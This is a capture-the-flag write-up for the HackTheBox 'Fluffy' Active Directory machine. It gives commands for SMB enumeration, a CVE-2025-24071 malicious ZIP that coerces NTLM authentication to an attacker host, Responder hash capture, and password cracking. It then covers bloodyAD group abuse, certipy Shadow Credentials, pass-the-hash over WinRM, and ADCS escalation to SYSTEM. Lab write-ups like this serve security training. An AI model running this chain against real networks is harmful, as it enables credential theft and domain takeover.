All write-ups
6 min read

HackTheBox: Fluffy

HackTheBoxWindowsActive DirectoryNTLM RelayingADCSShadow Credentials

HackTheBox: Fluffy

1. Reconnaissance & SMB Enumeration

Provided Initial Credentials: j.fleischman / [REDACTED]

Initial port scanning indicated a standard Windows Active Directory Domain Controller (dc01.fluffy.htb).

Using the provided credentials, we enumerated SMB shares via nxc and smbclient.

nxc smb dc01.fluffy.htb -u 'j.fleischman' -p '[REDACTED]' --shares
smbclient //dc01.fluffy.htb/IT -U 'fluffy.htb\j.fleischman%[REDACTED]'

The IT share contained three intriguing files:

We mounted the share and retrieved the files for local analysis.

sudo mkdir -p /mnt/fluffy-it
sudo mount -t cifs //dc01.fluffy.htb/IT /mnt/fluffy-it -o username='j.fleischman',password='[REDACTED]',domain=fluffy.htb
cp /mnt/fluffy-it/* .
sudo umount /mnt/fluffy-it

2. Vulnerability Discovery (CVE-2025-24071)

Extracting KeePass-2.58.zip revealed a configuration file, KeePass.exe.config. Reviewing the XML highlighted a dangerous configuration:

<loadFromRemoteSources enabled="true" />

Correlating this with recent disclosures pointed to CVE-2025-24071, a vulnerability in Windows File Explorer handling that allows attackers to coerce NTLM authentication (hash capture) when a victim views a maliciously crafted ZIP archive.

3. Initial Access via NTLM Hash Capture

We utilized a public PoC to generate a malicious .zip file designed to trigger an authentication callback to our attacker machine when processed by the system's indexing tool (Everything.exe).

python exploit.py -f Microsoft -i <ATTACKER_IP>

To ensure execution, we injected the malicious XML payload directly into the legitimate KeePass-2.58.zip archive and replaced the file on the IT share.

Catching the Hash: We started Responder to listen for incoming NTLM authentication requests.

sudo responder -I tun0 -v

Shortly after uploading the modified archive, Responder captured the NTLMv2 hash for the user p.agila. We cracked the hash offline using John the Ripper.

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Result: Password cracked: [REDACTED].

4. Lateral Movement & Active Directory Certificate Services (ADCS)

Further AD enumeration revealed that p.agila is a member of the SERVICE ACCOUNT MANAGERS group, which possesses GenericAll rights over the SERVICE ACCOUNTS group.

We leveraged bloodyAD to add p.agila to the SERVICE ACCOUNTS group.

bloodyAD --host 10.10.11.69 -d fluffy.htb -u p.agila -p '[REDACTED]' add groupMember 'Service Accounts' p.agila

The SERVICE ACCOUNTS group contains the winrm_svc account, which holds remote management privileges. However, p.agila only holds GenericWrite, not GenericAll, over winrm_svc, preventing a direct password reset.

Shadow Credentials Attack

To bypass this limitation, we utilized a Shadow Credentials attack via certipy. This technique modifies the msDS-KeyCredentialLink attribute to forge a certificate for PKINIT authentication, allowing us to retrieve the user's NTLM hash without changing their password.

certipy shadow auto -username 'p.agila@fluffy.htb' -password '[REDACTED]' -account winrm_svc

The tool automatically acquired the NTLM hash for winrm_svc. We then authenticated via Pass-the-Hash using WinRM:

evil-winrm -i fluffy.htb -u 'winrm_svc' -H '[REDACTED]'

Result: Gained shell as winrm_svc. User flag secured.

5. Privilege Escalation

Enumeration identified another high-value account, ca_svc, which is a member of the CERT PUBLISHERS group. We repeated the Shadow Credentials methodology to target ca_svc.

First, we ensured p.agila owned the target group:

bloodyAD --host 10.129.248.121 -d 'fluffy.htb' -u 'p.agila' -p '[REDACTED]' set owner 'SERVICE ACCOUNTS' 'p.agila'

Next, we forged credentials for ca_svc:

certipy shadow auto -username 'p.agila@fluffy.htb' -password '[REDACTED]' -account ca_svc

Once we obtained the hash for ca_svc ([REDACTED]), we exploited the account's privileges within the ADCS infrastructure to issue a certificate granting Domain Admin equivalent privileges, completing the escalation path to SYSTEM.

Result: SYSTEM shell obtained. The root flag is located at C:\Users\Administrator\Desktop\root.txt ([REDACTED]).